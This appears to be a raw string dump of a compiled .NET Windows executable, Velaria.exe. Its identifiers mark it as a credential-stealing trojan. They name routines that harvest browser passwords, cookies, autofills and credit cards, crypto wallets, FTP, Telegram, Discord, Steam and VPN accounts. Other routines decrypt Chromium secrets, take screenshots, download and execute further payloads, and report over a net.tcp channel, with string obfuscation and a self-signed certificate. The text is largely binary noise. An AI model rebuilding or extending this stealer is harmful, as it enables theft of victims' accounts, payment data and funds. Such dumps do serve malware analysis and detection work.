!This program cannot be run in DOS mode.
`.rsrc
@.reloc
KDBM(x
Y _c
Y _c
%-"&s-
v4.0.30319
#Strings
3EEECA8C90CAA62AB5F9CCDD8715DA5023F4BA00
__StaticArrayInitTypeSize=10
__StaticArrayInitTypeSize=20
359A00EF6C789FD4C18644F56C5D3F97453FFF20
__StaticArrayInitTypeSize=30
__StaticArrayInitTypeSize=2840
__StaticArrayInitTypeSize=40
77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
A8F9B62160DF085B926D5ED70E2B0F6C95A25280
F413CEA9BAA458730567FE47F57CC3C94DDF63C0
<>9__0_0
<TryFind>b__0_0
n>b__0_0
<.ctor>b__0_0
<.cctor>b__0_0
<>c__DisplayClass0_0
<GetWindowsVersion>g__HKLM_GetString|11_0
<>c__DisplayClass1_0
<>9__2_0
<Init>b__2_0
<>9__4_0
<DomainExists>b__4_0
<>c__DisplayClass4_0
<>9__5_0
<GetScanArgs>b__5_0
<>9__8_0
<ListOfPrograms>b__8_0
<>9__9_0
<AvailableLanguages>b__9_0
<Run>b__0
<.ctor>b__0
<>p__0
g_E_c_
718D1294A5C2D3F3D70E09F2F473155C4F567201
2FBDC611D3D91C142C969071EA8A7D3D10FF6301
sf34asd21
855FED6E03442FBB3AF914FFBFA9DA82813817A1
989657DD93570810E43C5B1F68E529460CA796F1
<>9__4_1
<DomainExists>b__4_1
n>b__1
<.ctor>b__1
<>p__1
Func`1
Nullable`1
IEnumerable`1
IOrderedEnumerable`1
CallSite`1
ICollection`1
IEnumerator`1
IList`1
ChannelFactory`1
__StaticArrayInitTypeSize=102
2A19BFD7333718195216588A698752C517111B02
__StaticArrayInitTypeSize=12
__StaticArrayInitTypeSize=22
__StaticArrayInitTypeSize=32
Microsoft.Win32
ToUInt32
ToInt32
A937C899247696B6565665BE3BD09607F49A2042
4EC18FAB222C9FF2E5161F21A90F187D5D98E042
__StaticArrayInitTypeSize=42
__StaticArrayInitTypeSize=152
__StaticArrayInitTypeSize=62
__StaticArrayInitTypeSize=72
__StaticArrayInitTypeSize=282
D67333042BFFC20116BF01BC556566EC76C6F7E2
EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
<>9__0_2
n>b__0_2
<DomainExists>b__2
<GetTokens>d__2
<>p__2
Func`2
KeyValuePair`2
LSIDsd2
aso0shq2
slkahs2
04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
asdoiad0123
asd44123
sdf923
FC7F87A17388346181B50EC829634D7F8E842743
EB14352FBADB40E2FA237D444A6575B918573C43
4E3D7F188A5F5102BEC5B820632BBAEC26839E63
kadsoji83
sdfkas83
8C550EA96A693C687FFAB21F3B1A5F835E23E3B3
387D8DBBFB12BA323F1E0F1F539B4DA9550070C3
C39241F447680C35D3966F9446AAE6D462E04AD3
79E9B68FB6E1987DED749BCD71143BD8EB323CE3
n>b__3
<>p__3
Func`3
dvsjiohq3
asdk9y3
4EF472E2E74116C7FD95C74AB422CCF80DB1C404
__StaticArrayInitTypeSize=14
__StaticArrayInitTypeSize=124
__StaticArrayInitTypeSize=24
sdfo8n234
gkdsi8y234
46884713B2F882E5304A1FF1B16370575A53E434
sdfk8h34
asdlasd9h34
__StaticArrayInitTypeSize=144
__StaticArrayInitTypeSize=44
__StaticArrayInitTypeSize=154
93D9D319FF04F5E54F3A6431407A7B90388FDC54
FromBase64
ToInt64
67CD3B1DF0AD5BAEAA1ABDDA3FCAFB2EEBDD2684
24745D8330E61F986032C2034A579B0B80181594
1076B53156E190E9BCBE281016712F2D3F02D3B4
<>9__0_4
n>b__0_4
<>o__4
fdfg9i3jn4
get_IPv4
set_IPv4
FF3BAB78FE99DEED16DD82BB73EE1AE091A07815
EB2DB456E0D779E528D1474FA55AC99055A5E815
38F431A549411AEB32810068A4C83250B2D31E15
B14822E504AE1EF678AE0E823684D7B32F95A725
askd435
A898408AA9A30B686240D921FE0E3E3A01EE91A5
703C0129D2425B4E51361C24EBE8A0042E483AC5
2A92E2F98903398CD12F10BDF583F44C2C6EEBF5
n>b__5
Func`5
Action`5
__StaticArrayInitTypeSize=16
410D551BF9DC1F0CF262E4DB1077795D56EEC026
E0CEB3E46E857A70CFB575A05B01A64806A8D426
__StaticArrayInitTypeSize=46
__StaticArrayInitTypeSize=76
__StaticArrayInitTypeSize=6
80E5A0A2B81DB2473AFBB3FDD6F479670B7B41C6
0E5921723BD3C6CB75662A156FB56AF05A7152C6
<>9__0_6
n>b__0_6
FB77AA8CDAF4D2192696350B7AB546B533467477
18B532EF2959EF2ED8C549D712E3446FF49E4287
007A56C60CB686C542C5A63F4806094A4F9494B7
89C95FB6F8086AFCCD50B1B257669F2B17C047B7
D82572C56BDDD62E320B8BDAF0397A0DF9DD5BF7
n>b__7
__StaticArrayInitTypeSize=18
__StaticArrayInitTypeSize=28
__StaticArrayInitTypeSize=38
__StaticArrayInitTypeSize=48
1A79939AEFF161E557D02CB37CD9A811ABCAF458
__StaticArrayInitTypeSize=58
A9B6DE7C485B3014653A30C8B4BEFA8F70610178
__StaticArrayInitTypeSize=78
00D675BCFF1D9FECDD0CA29C78CB6A24748C8788
1938FDF81D9EFE09E9786A7A7DDFFBD755961098
DF08DD4DFFDB6C9048202CAE65882EF91ECE6BA8
9B88C78E81ADB9E7247AB37D1F5F3861810916D8
46F273EF641E07D271D91E0DC24A4392582671F8
get_UTF8
<>9__0_8
n>b__0_8
asdkadu8
20CB5B8963ECE3D796594F043D66C0E0BAD86669
2B9522D4F7398AB5DB789596FE5DB90589B031E9
<>o__9
<Module>
<PrivateImplementationDetails>
8743F6DD6877BBC815E9F16BEC59057DD1A89B0A
96D6CB223DCF17F7C9F93C825239BDAA3634674A
FE79FF373808574898C82AC1320C55C1182FB75A
A3EFD00EA085079EE7F97407F8EFF07E3990696A
4C1117B01D5C4E103EE817F889EC547C63B47B7A
A9139732ED4CF84F8CE948DCB134114E4F24598A
57F4CB785574C3A09AF99937BF91EA2C31E37C8A
BEDDFAEB0360B1694AB8CD2A69986414790A1D9A
E63C93C721909983D6276C980CFF923987A4D2AA
4CDA4454A3C36A7EBDCF8FE8B804B379A31D33CA
A8A5F2DC86E781EC7360D1DDBE09F80EEECE48EA
EBD075615CBE4A710F9410FFECEAF6110A01922B
DF2BDC3975DC25BFAFFA4976E9CD1E38AADF463B
9D9AF3AE11A58D55EB8A6AEC8F03F7AD01E8994B
5BB3788A197C26B8310159EC9A81635814ABB05B
0410277C15CAD5E63A25F491DAEEF493B897678B
81E046FA1D93B661CC948A4DD1E01F20D6192E9B
28F794B091ED92F57BFC80EA32B18AF3A8183ADB
7FD227EEE2F38A50CFD286D228B794575C0025FB
4369729D8B79D0C651E00137A3B22A1A24DEBB4C
9D99781A42147118D9E59BED1BC9AE622BA64A6C
get_CC
set_CC
ScanCC
5F2F91D44A21E42A979E24B620CF42F2CB8687EC
BA7D69D99D9DBB0EE4285F6009DAABF743B9641D
System.Drawing.Drawing2D
FD4C77C0C4405C6A46E5C3CE53E0AE6BAEE7746D
6353B688B99A3543932AA127DAA0E48FBC646BBD
B5B4FA236B87DBCD8055443F05776B10DDEFA5CD
get_ReleaseID
set_ReleaseID
get_TaskID
set_TaskID
6F66485AF823BAE1F185740DA7F4F595701CD22E
E3E8284EDCB98A1085E693F9525A3AC3D705B82E
571B1023DF3ABFB94C92465B365B1814FEBFAB3E
4956BACC797B0C6C013C7E4846581396C9EF0D8E
459812D18B50C8E5F96831EFD700F962F692D29E
71E427369E07185AE0407E3FAB1A16ED62BD159E
95098CDF929872F9B67E58070D088F8238F7CABE
CE18B047107AA23D1AA9B2ED32D316148E02655F
4B05CEBD7D70F1607D474CAE176FEAEB7439795F
E705C6345C26AF82E64D22DBE44B2A3514F2F06F
8C49F78A06E711CF0E21134D0B091985336CC37F
A9BBD7EDD219DE023751096B9380E8A4C1EF797F
501BADE98ACDE8BF4A0424FD9A4354615FF08C7F
D7DC31ED4320E74979DEC780486CF9586470608F
B14D74C51EAE4F88FBF39B8BD07DA392799FCAAF
7BF285852D43939E0FBD7B6C5592189AF986E8BF
3DB6DAD76E13B54DC03AF1C6092C40388E57FBBF
get_ASCII
LocatorAPI
get_URL
set_URL
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
get_JSON
FromJSON
ToJSON
ExtensionNordVPN
TryInitNordVPN
get_ScanVPN
set_ScanVPN
ExtensionOpenVPN
TryInitOpenVPN
ExtendV
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
get_IP
set_IP
get_ScanFTP
set_ScanFTP
DESKTOPVERTRES
BCRYPT_KEY_LENGTHS_STRUCT
get_TZ
set_TZ
value__
Velaria
FileZilla
cbData
DownloadData
ProtectedData
bEncryptedData
cbAuthData
pbAuthData
mscorlib
dsf9jb
DecryptBlob
ReleaseHdc
GetHdc
Graphic
System.Collections.Generic
get_ManagedThreadId
<>l__initialThreadId
updateId
pszAlgId
taskId
get_SessionId
set_MaxBytesPerRead
get_CurrentThread
Download
managed
BytesToStringConverted
<IPv4>k__BackingField
<CC>k__BackingField
<ReleaseID>k__BackingField
<TaskID>k__BackingField
<URL>k__BackingField
<ScanVPN>k__BackingField
<IP>k__BackingField
<ScanFTP>k__BackingField
<TZ>k__BackingField
<ScanDiscord>k__BackingField
<Password>k__BackingField
<PostalCode>k__BackingField
<ZipCode>k__BackingField
<geoplugin_countryCode>k__BackingField
<country_code>k__BackingField
<geoplugin_longitude>k__BackingField
<geoplugin_latitude>k__BackingField
<Language>k__BackingField
<NameOfFile>k__BackingField
<PathOfFile>k__BackingField
<DirOfFile>k__BackingField
<BrowserProfile>k__BackingField
<Name>k__BackingField
<MachineName>k__BackingField
<HolderName>k__BackingField
<BrowserName>k__BackingField
<Username>k__BackingField
<HardType>k__BackingField
<Hardware>k__BackingField
<SeenBefore>k__BackingField
<Secure>k__BackingField
<Value>k__BackingField
<Recoursive>k__BackingField
<Tag>k__BackingField
<TaskArg>k__BackingField
<Path>k__BackingField
<Month>k__BackingField
<postal>k__BackingField
<ScanSteam>k__BackingField
<ScanTelegram>k__BackingField
<ScanScreen>k__BackingField
<Open>k__BackingField
<geoplugin_region>k__BackingField
<Version>k__BackingField
<OSVersion>k__BackingField
<NameOfApplication>k__BackingField
<Location>k__BackingField
<FileLocation>k__BackingField
<Action>k__BackingField
<Resolution>k__BackingField
<Proton>k__BackingField
<Pattern>k__BackingField
<ip>k__BackingField
<Http>k__BackingField
<Year>k__BackingField
<Number>k__BackingField
<NameOfBrowser>k__BackingField
<DomainFilter>k__BackingField
<Counter>k__BackingField
<RootDir>k__BackingField
<Monitor>k__BackingField
<LibPtr>k__BackingField
<AvailableLanguages>k__BackingField
<Cookies>k__BackingField
<ScannedFiles>k__BackingField
<ScanFiles>k__BackingField
<DicrFiles>k__BackingField
<GameLauncherFiles>k__BackingField
<MessageClientFiles>k__BackingField
<SystemHardwares>k__BackingField
<Softwares>k__BackingField
<Expires>k__BackingField
<Processes>k__BackingField
<Configs>k__BackingField
<ScannerArgs>k__BackingField
<PassedPaths>k__BackingField
<ScanFilesPaths>k__BackingField
<ScanChromeBrowsersPaths>k__BackingField
<ScanGeckoBrowsersPaths>k__BackingField
<ScanDetails>k__BackingField
<SecurityUtils>k__BackingField
<Autofills>k__BackingField
<Logins>k__BackingField
<Actions>k__BackingField
<PreStageActions>k__BackingField
<FtpConnections>k__BackingField
<Browsers>k__BackingField
<InstalledBrowsers>k__BackingField
<ScanBrowsers>k__BackingField
<TaskProcessors>k__BackingField
<ScannedWallets>k__BackingField
<ScanWallets>k__BackingField
<NordAccounts>k__BackingField
<Result>k__BackingField
<os_crypt>k__BackingField
<geoplugin_request>k__BackingField
<Host>k__BackingField
<Body>k__BackingField
<encrypted_key>k__BackingField
<Directory>k__BackingField
<Country>k__BackingField
<City>k__BackingField
<city>k__BackingField
<geoplugin_city>k__BackingField
RecordHeaderField
ReadToEnd
Append
CreateBind
TryFind
NotFound
set_IsBackground
FromHwnd
method
get_ScanDiscord
set_ScanDiscord
ExtensionDiscord
TryInitDiscord
get_Password
set_Password
sdf934asd
asdk9345asd
adkasd8u3hbasd
ksjasdkhbasd
kkdhfakdasd
sdfk38jasd
asdk8jasd
sdfm83kjasd
asdaid9h24kasd
sdfk83hkasd
sdf9j3nasd
asdasod9234oasd
a9duh3zd
Chr_0_M_e
serviceInterface
Replace
IsNullOrWhiteSpace
cbNonce
pbNonce
source
get_PostalCode
set_PostalCode
get_ZipCode
set_ZipCode
get_geoplugin_countryCode
set_geoplugin_countryCode
set_Mode
FileMode
set_SmoothingMode
chainingMode
SessionMode
X509CertificateValidationMode
set_CertificateValidationMode
set_InterpolationMode
set_TransferMode
set_PixelOffsetMode
SecurityMode
SelectSingleNode
XmlNode
xmlNode
get_country_code
set_country_code
get_Unicode
get_BigEndianUnicode
get_geoplugin_longitude
set_geoplugin_longitude
get_geoplugin_latitude
set_geoplugin_latitude
FromImage
set_Message
percentage
get_Language
set_Language
get_CurrentInputLanguage
AddRange
ScannedCookie
EndInvoke
BeginInvoke
ReadContextTable
IEnumerable
IDisposable
Visible
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
ReadFile
DownloadFile
ScannedFile
get_NameOfFile
set_NameOfFile
get_PathOfFile
set_PathOfFile
get_DirOfFile
set_DirOfFile
get_BrowserProfile
set_BrowserProfile
profile
SetConsole
hModule
get_Name
set_Name
procName
fieldName
tableName
set_FileName
fileName
get_MachineName
set_MachineName
GeckoRoamingName
ChromeGetRoamingName
get_EnglishName
GeckoLocalName
ChromeGetLocalName
get_FullName
ItemName
get_UserDomainName
get_HolderName
set_HolderName
get_UserName
get_BrowserName
set_BrowserName
ChromeGetName
GetProcessesByName
get_DisplayName
filename
get_Username
set_Username
DateTime
get_CreationTime
AppendLine
get_NewLine
Combine
LocalMachine
DataProtectionScope
dataProtectionScope
OperationContextScope
pszBlobType
get_HardType
set_HardType
ChangeType
HardwareType
ValueType
MessageCredentialType
set_ClientCredentialType
SecurityProtocolType
GetType
get_PropertyType
blvnzcwqe
FileShare
Compare
get_Hardware
set_Hardware
SystemHardware
System.Core
get_SeenBefore
set_SeenBefore
get_Secure
set_Secure
get_Culture
get_InvariantCulture
GetImageBase
IdentitySenderBase
WebResponse
ApiResponse
GetResponse
System.IDisposable.Dispose
Reverse
X509Certificate
get_ServiceCertificate
certificate
DownloadUpdate
CommandLineUpdate
DownloadAndExecuteUpdate
OpenUpdate
VerifyUpdate
Create
BCryptCloseAlgorithmProviderDelegate
BCryptOpenAlgorithmProviderDelegate
GetDelegate
BCryptDecryptDelegate
MulticastDelegate
BCryptImportKeyDelegate
BCryptDestroyKeyDelegate
BCryptSetAlgorithmPropertyDelegate
BCryptGetPropertyDelegate
LocalState
<>1__state
Delete
CallSite
DynamicAttribute
CompilerGeneratedAttribute
UnverifiableCodeAttribute
DebuggableAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
ExtensionAttribute
SecurityPermissionAttribute
DataMemberAttribute
EnumMemberAttribute
CompilationRelaxationsAttribute
DataContractAttribute
ServiceContractAttribute
OperationContractAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
get_Value
set_Value
GatherValue
get_HasValue
GetValue
SetValue
ReadContextValue
get_Recoursive
set_Recoursive
Remove
Velaria.exe
get_Size
cbSize
_pageSize
set_MaxReceivedMessageSize
_sqlDataTypeSize
MaxAuthTagSize
set_MaxBufferPoolSize
MonitorSize
Serialize
Deserialize
SuppressFinalize
Resize
SizeOf
get_ItemOf
IndexOf
sdfi35sdf
ReadOff
get_Tag
set_Tag
authTag
WalletConfig
get_Png
System.Threading
NetTcpBinding
_dbEncoding
GetEncoding
get_CurrentEncoding
System.Drawing.Imaging
FileScanning
System.Runtime.Versioning
FromBase64String
ToString
GetString
GetHexString
Substring
System.Drawing
ConvertToULong
get_TaskArg
set_TaskArg
FileScannerArg
scannerArg
Search
GetMd5Hash
ComputeHash
get_Path
set_Path
profilePath
GetFolderPath
rootPath
get_Width
get_Length
dwMinLength
set_MaxJsonLength
set_MaxStringContentLength
get_RowLength
dwMaxLength
set_MaxArrayLength
StartsWith
get_Month
set_Month
set_MaxDepth
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
PreCheck
OpenLink
EnumCook
ScanCook
UpdateTask
updateTask
TryCompleteTask
AllocHGlobal
FreeHGlobal
get_Local
Marshal
X509CertificateRecipientClientCredential
get_postal
set_postal
cbLabel
pbLabel
System.ServiceModel
CreateChannel
IClientChannel
IContextChannel
maxLevel
gdi32.dll
kernel32.dll
Autofill
System.Xml
get_SecurityProtocol
set_SecurityProtocol
FileStream
GetResponseStream
MemoryStream
get_ScanSteam
set_ScanSteam
get_ScanTelegram
set_ScanTelegram
Program
get_Item
get_Is64BitOperatingSystem
phAlgorithm
HashAlgorithm
Random
TryConfirm
RootNum
rowNum
DecryptChromium
op_LessThan
TimeSpan
get_ScanScreen
set_ScanScreen
get_PrimaryScreen
get_Open
set_Open
X509Chain
GeoPlugin
MessageBoxIcon
get_geoplugin_region
set_geoplugin_region
get_OSVersion
set_OSVersion
get_Version
set_Version
get_FileVersion
dwInfoVersion
BrowserVersion
GetWindowsVersion
version
get_NameOfApplication
set_NameOfApplication
get_Authentication
X509ServiceCertificateAuthentication
get_Location
set_Location
get_FileLocation
set_FileLocation
pszImplementation
System.Globalization
System.Runtime.Serialization
System.Web.Script.Serialization
get_Action
set_Action
IsValidAction
UpdateAction
SecurityAction
action
System.Reflection
InputLanguageCollection
MatchCollection
PathsCollection
ManagementObjectCollection
TryGetConnection
EndpointConnection
RequestConnection
connection
SearchOption
searchOption
CryptographicException
NotSupportedException
InvalidOperationException
System.ServiceModel.Description
System.Runtime.ConstrainedExecution
get_Resolution
set_Resolution
StringComparison
get_Proton
set_Proton
get_Pattern
set_Pattern
Unknown
CompareTo
FileInfo
fileInfo
TimeZoneInfo
CultureInfo
pPaddingInfo
FileSystemInfo
FileVersionInfo
GetVersionInfo
GeoInfo
CSharpArgumentInfo
ProcessStartInfo
DirectoryInfo
PropertyInfo
DeviceCap
Bitmap
MessageSecurityOverTcp
get_ip
set_ip
NordApp
Microsoft.CSharp
get_Http
set_Http
asdak83jq
System.Linq
get_Year
set_Year
InvokeMember
GetMember
get_Number
set_Number
GetSerialNumber
MessageHeader
CreateHeader
AddressHeader
ConfigReader
XmlReader
StreamReader
XmlTextReader
MD5CryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
CryptoProvider
IFormatProvider
provider
StringBuilder
dataFolder
SpecialFolder
GetFolder
FullInfoSender
PartsSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
Buffer
ServicePointManager
DesktopMessanger
GameLauncher
FileSearcher
ManagementObjectSearcher
Gather
FileCopier
FileScanner
NativeHelper
GdiHelper
SystemInfoHelper
CryptoHelper
ToUpper
CurrentUser
get_NameOfBrowser
set_NameOfBrowser
get_DomainFilter
set_DomainFilter
GetDelegateForFunctionPointer
get_Counter
set_Counter
BitConverter
TaskResolver
ToLower
JavaScriptSerializer
get_RootDir
set_RootDir
ITaskProcessor
IEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<ScannedFile>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
GetWindowsScreenScalingFactor
.cctor
InvokeConstructor
get_Monitor
set_Monitor
get_LibPtr
IntPtr
base64str
sdkf9h234as
set_ReaderQuotas
XmlDictionaryReaderQuotas
Graphics
System.Diagnostics
Fields
get_Bounds
GetGraphicCards
ScanPasswords
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
get_ChildNodes
get_AvailableLanguages
set_AvailableLanguages
ExtensionLanguages
TryInitLanguages
get_InstalledInputLanguages
languages
Matches
get_Cookies
set_Cookies
MakeTries
EnumerateDirectories
GetDirectories
_masterTableEntries
_tableEntries
GetProperties
ExpandEnvironmentVariables
get_ScannedFiles
set_ScannedFiles
ExtensionScannedFiles
TryInitScannedFiles
remoteFiles
ExtensionSteamFiles
TryInitSteamFiles
ExtensionTelegramFiles
TryInitTelegramFiles
get_ScanFiles
set_ScanFiles
get_DicrFiles
set_DicrFiles
get_GameLauncherFiles
set_GameLauncherFiles
GetFiles
get_MessageClientFiles
set_MessageClientFiles
profiles
GetSubKeyNames
get_SystemHardwares
set_SystemHardwares
ExtensionHardwares
TryInitHardwares
hardwares
get_Softwares
set_Softwares
ExtensionInstalledSoftwares
TryInitInstalledSoftwares
softwares
get_Expires
set_Expires
get_Processes
set_Processes
ListOfProcesses
ExtensionProcesses
TryInitProcesses
processes
System.Security.Cryptography.X509Certificates
ReleaseUpdates
GetUpdates
StripQuotes
FromMinutes
_fileBytes
WriteAllBytes
ConvertToBytes
GetBytes
GetLogicalDrives
CSharpArgumentInfoFlags
CSharpBinderFlags
dwFlags
get_Configs
set_Configs
configs
settings
ScanningArgs
GetScanArgs
get_ScannerArgs
set_ScannerArgs
TryGetArgs
get_PassedPaths
set_PassedPaths
FindPaths
browserPaths
get_ScanFilesPaths
set_ScanFilesPaths
get_ScanChromeBrowsersPaths
set_ScanChromeBrowsersPaths
get_ScanGeckoBrowsersPaths
set_ScanGeckoBrowsersPaths
AddMonths
get_Ticks
remoteTasks
TryGetTasks
Locals
get_Credentials
ScanCredentials
ClientCredentials
System.ServiceModel.Channels
get_ScanDetails
set_ScanDetails
get_SecurityUtils
set_SecurityUtils
ScanFills
get_Autofills
set_Autofills
ListOfPrograms
System.Windows.Forms
GetTokens
domains
Contains
get_Logins
set_Logins
System.Web.Extensions
System.Text.RegularExpressions
System.Security.Permissions
get_Actions
set_Actions
get_PreStageActions
set_PreStageActions
System.Collections
get_FtpConnections
set_FtpConnections
ExtensionFtpConnections
TryInitFtpConnections
StringSplitOptions
MessageBoxButtons
searchPatterns
patterns
GetDeviceCaps
GetCaps
get_Chars
get_OutgoingMessageHeaders
ExtensionDefenders
TryInitDefenders
defenders
scanners
RuntimeHelpers
get_Browsers
set_Browsers
get_InstalledBrowsers
set_InstalledBrowsers
ExtensionInstalledBrowsers
TryInitInstalledBrowsers
installedBrowsers
get_ScanBrowsers
set_ScanBrowsers
ExtensionBrowsers
GetBrowsers
TryInitBrowsers
browsers
loginPairs
SslPolicyErrors
sslPolicyErrors
get_TaskProcessors
GetProcessors
FileAccess
Success
success
GetCurrentProcess
GetProcAddress
EndpointAddress
address
get_ScannedWallets
set_ScannedWallets
ExtensionColdWallets
TryInitColdWallets
AllWallets
get_ScanWallets
set_ScanWallets
GetArguments
get_NordAccounts
set_NordAccounts
get_Exists
DomainExists
arrays
ParsSt
Concat
ImageFormat
IContract
ManagementBaseObject
hObject
ICommunicationObject
ManagementObject
cbKeyObject
pbKeyObject
object
Select
CheckConnect
Unprotect
System.Net
Target
System.Collections.IEnumerator.Reset
offset
get_Height
set_RecursionLimit
TryInit
WaitForExit
cbSalt
GetValueOrDefault
get_Result
pcbResult
IAsyncResult
DialogResult
ScanResult
__result
GetRecent
WebClient
System.Management
XmlElement
get_DocumentElement
dwIncrement
SqlStatement
Environment
XmlDocument
System.Collections.Generic.IEnumerator<ScannedFile>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<ScannedFile>.get_Current
System.Collections.IEnumerator.get_Current
<>2__current
Content
get_Count
set_MaxNameTableCharCount
Account
OsCrypt
get_os_crypt
set_os_crypt
StringDecrypt
BCryptDecrypt
RepeatPart
ThreadStart
TrimStart
Convert
WebRequest
VerifyScanRequest
get_geoplugin_request
set_geoplugin_request
XmlNodeList
ToList
get_Host
set_Host
set_Timeout
set_SendTimeout
set_CloseTimeout
set_ReceiveTimeout
set_OpenTimeout
timeout
cbInput
pbInput
cbOutput
pbOutput
MoveNext
System.Text
cipherText
get_InnerText
chiperText
ReadFileAsText
DbContext
cbMacContext
pbMacContext
ReadMasterOfContext
OperationContext
get_Now
GetConsoleWindow
set_CreateNoWindow
nCmdShow
kasdihbfpfduqw
DownloadAndEx
endIdx
startIdx
nIndex
startIndex
rowIndex
MessageBox
OrderBy
TryInitDisplay
display
InitializeArray
ToArray
Consistency
get_Body
set_Body
get_Key
OpenSubKey
ReadKey
chromeKey
stringKey
bMasterKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
get_encrypted_key
set_encrypted_key
TryVerify
System.Security.Cryptography
GetExecutingAssembly
SelectMany
BlockCopy
entropy
LoadLibrary
FreeLibrary
CollectMemory
ChannelFactory
SenderFactory
get_Directory
set_Directory
baseDirectory
CreateDirectory
set_WorkingDirectory
get_SystemDirectory
profilesDirectory
TableEntry
SqliteMasterEntry
get_Country
set_Country
Registry
get_City
set_City
get_geoplugin_city
set_geoplugin_city
get_city
set_city
op_Equality
op_Inequality
System.ServiceModel.Security
System.Security
System.Net.Security
set_Security
NetTcpSecurity
CreateDnsIdentity
EndpointIdentity
IsNullOrEmpty
IsEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
pszProperty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
CheckConnect
EnvironmentSettings
SetEnvironment
InitDisplay
ExtensionDefenders
ExtensionLanguages'
ExtensionInstalledSoftwares
ExtensionProcesses
ExtensionHardwares
ExtensionBrowsers#
ExtensionFtpConnections&
ExtensionInstalledBrowsers!
ExtensionScannedFiles
ExtensionColdWallets
ExtensionSteamFiles
ExtensionNordVPN
ExtensionOpenVPN
ExtendV
ExtensionTelegramFiles
ExtensionDiscord
Confirm
GetUpdates
VerifyUpdate7
FileScannerArgT
Namespace
BrowserExtension5
WalletConfigT
Namespace
BrowserExtension
IContractTUwSystem.ServiceModel.SessionMode, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SessionMode
AutofillT
Namespace
BrowserExtension7
ScannedBrowserT
Namespace
BrowserExtension6
ScannedCookieT
Namespace
BrowserExtension+
Namespace
BrowserExtension0
AccountT
Namespace
BrowserExtension
HardwareType
RemoteTaskAction5
ScanningArgsT
Namespace
BrowserExtension4
ScanDetailsT
Namespace
BrowserExtension7
SystemHardwareT
Namespace
BrowserExtension7
BrowserVersionT
Namespace
BrowserExtension4
ScannedFileT
Namespace
BrowserExtension3
UpdateTaskT
Namespace
BrowserExtension3
ScanResultT
Namespace
BrowserExtension
GeoPlugin
LocalState
OsCrypt
Directory
Pattern
Recoursive
RootDir
ScannerArgs
BrowserName
BrowserProfile
Logins
Autofills
Cookies
Secure
Expires
HolderName
Number
Username
Password
ScanBrowsers
ScanFiles
ScanFTP
ScanWallets
ScanScreen
ScanTelegram
ScanVPN
ScanSteam
ScanDiscord
ScanFilesPaths#
ScanChromeBrowsersPaths"
ScanGeckoBrowsersPaths
Configs
SecurityUtils
AvailableLanguages
Softwares
Processes
SystemHardwares
Browsers
FtpConnections
InstalledBrowsers
ScannedFiles
GameLauncherFiles
ScannedWallets
Proton
MessageClientFiles
DicrFiles
Counter
HardType
NameOfBrowser
Version
PathOfFile
NameOfFile
NameOfApplication
DirOfFile
TaskID
TaskArg
Action
DomainFilter
Hardware
ReleaseID
MachineName
OSVersion
Language
ScreenSize
ScanDetails
Country
TimeZone
Monitor
ZipCode
FileLocation
SeenBefore
geoplugin_request
geoplugin_city
geoplugin_region!
geoplugin_countryCode
geoplugin_latitude
geoplugin_longitude
postal
country_code
os_crypt
encrypted_key
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Windle Trance Inc.1
9X1(0&
tewelsleepiness@gmail.com1
Tewel0
211007210000Z
311014210000Z0d1
Windle Trance Inc.1
9X1(0&
tewelsleepiness@gmail.com1
Tewel0
do{FsTJ
,8^+BY
Windle Trance Inc.1
9X1(0&
tewelsleepiness@gmail.com1
| |6YY
4 5$<'=4>D?G@JAOBSCbDfElFpGqYr
Z!["\"]$^$_%`&a&b'cHdHeHfHgHhHiHjHkHlHmHnHoHpHqHrHsHtHuHvHwHxHyHzH{H|H}H~H
LEnvironmentogiEnvironmentn DatEnvironmenta
Environment
WSystem.Texteb DatSystem.Texta
System.Text
CoCryptographyokieCryptographys
Cryptography
OFileInfopeFileInfora GFileInfoX StabFileInfole
FileInfo
OpLinqera GLinqX
ApGenericpDaGenericta\RGenericoamiGenericng\
Generic
UNKNOWN
cmyredmyit_cmyardmys
%USEWanaLifeRPROFILE%\AppDaWanaLifeta\LWanaLifeocal
WanaLife
String.Replace
String.Remove
bcrKKKKOOOOypt.dKKKKOOOOll
KKKKOOOO
BCryptOpenAlgorithmProvider
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptDestroyKey
BCryptGetProperty
BCryptSetProperty
BCryptImportKey
windows-1251
Microsoft Primitive Provider
ChainingModeGCM
AuthTagLength
ChainingMode
ObjectLength
KeyDataBlob
BCrypt.BCryptImportKey() failed with status code:{0}
BCrypt.BCryptGetProperty() (get size) failed with status code:{0}
BCrypt.BCryptGetProperty() failed with status code:{0}
net.tcp://
localhost
fab440dd1f1c0900975c02f2f3794139
Authorization
